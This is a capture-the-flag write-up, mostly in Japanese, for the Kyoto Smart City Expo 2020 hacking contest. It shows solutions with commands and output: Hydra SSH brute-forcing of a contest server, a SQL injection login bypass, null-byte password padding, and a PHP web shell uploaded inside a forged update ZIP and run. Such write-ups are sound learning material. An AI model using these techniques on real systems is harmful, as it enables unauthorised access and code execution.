ハッキングコンテストin京都スマートシティエキスポ2020: Write up
- 0 decode(Very Easy)
- 1-1 FTP(Very Easy)
- 1-2 SSH avoidance(Very Easy)
- 2-1 basic authentication(Easy)
- 6-1 exploration(Very Easy)
- 7-1 hidden flag(Very Easy)
- 6-2 authentication avoidance(Easy)
- 4-1 breakthrough(Easy)
- 6-3 clairvoyance(Medium)
- 5-1 Discovery key(Easy)
0 decode(Very Easy)
$ echo -n 'RkxBR19reW90b3NtYXJ0Y2l0eWV4cG8=' | base64 -d FLAG_kyotosmartcityexpo
1-1 FTP(Very Easy)
1-2 SSH avoidance(Very Easy)
hydra -L user.txt -P password.txt 54.150.39.201 -s 52222 ssh 255 ⨯ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-11 21:14:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:100/p:100), ~625 tries per task [DATA] attacking ssh://54.150.39.201:52222/ [52222][ssh] host: 54.150.39.201 login: admin password: password
$ ssh admin@54.150.39.201 -p 52222 255 ⨯ The authenticity of host '[54.150.39.201]:52222 ([54.150.39.201]:52222)' can't be established. ECDSA key fingerprint is SHA256:K7NbGooE0P1B3L7BaC/or41slf4l+P8sfJSR71TtqIc. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[54.150.39.201]:52222' (ECDSA) to the list of known hosts. admin@54.150.39.201's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1030-aws x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Dec 12 02:09:52 2020 from 115.124.149.87 admin@58d2aec14ceb:~$ ls flag.txt q6 admin@58d2aec14ceb:~$ cat flag.txt FLAG_jbSSTdXTLCc4aadmin@58d2aec14ceb:~$
2-1 basic authentication(Easy)
6-1 exploration(Very Easy)
$ strings q6_backend_1.1 authUT dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y= contents.phpUT "ip4h {Y`SL 6yAx Cj>Ks6 wIvS t#Yt authUT contents.phpUT (base) 13:18 ~/Downloads $ echo -n 'dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=' | base64 - d version:1.1,name:admin,password:FLAG_e0rPFGGe6Hakv
7-1 hidden flag(Very Easy)
flag: FLAG_iZAPDhs3T2iYS
6-2 authentication avoidance(Easy)
username='+OR+1=1--&password=
flag: FLAG_RqWGsVKFAQMUn
4-1 breakthrough(Easy)
ログイン画面があって6文字以上のパスワードを求められる。ソースコードをみると
パスワードは1234
なので足りない分を%00
で補うとログインできる。
username=user1&password=1234%00%00
flag: FLAG_ajiofeijljkjsdklajie
6-3 clairvoyance(Medium)
うまく更新ファイルをアップロードすれば任意のコード実行できそうだとわかる。
適当なファイルをアップロードしてもZIPの形式、またはパスワードが違います
と怒られるので既存のバージョン1.1
の更新ファイルを参考にExploitできるファイルをつくる。
1.1.zipの中にあるcontents.php
に<?php echo shell_exec($_GET['p']);?>
を追加して圧縮、アップロードする。
$ zip -rm 1.2.zip auth contents.php adding: auth (stored 0%) adding: contents.php (deflated 43%)
http://18.177.208.49/tmp/72386217aab504b7e38ee7c28415f2e1a9717101982109dec8.php?p=cat%20flag.php
でflag.php
ファイルを参照しようとするが
root奪取しないといけないのかと一瞬焦ったがソースコードみたらFLAGがあった。
flag: FLAG_ZaKKC00Wn9nis
5-1 Discovery key(Easy)
apk
ファイルはよくわからないのでapktool
つかって適当にデコードしたらAndroidManifest.xml
にFLAGがあった。
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11"> <uses-permission android:name="android.permission.INTERNET"/> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true"> <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/> <activity android:name="com.example.getcoupon.GetCouponActivity"/> <activity android:name="com.example.getcoupon.MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter> </activity> </application> </manifest>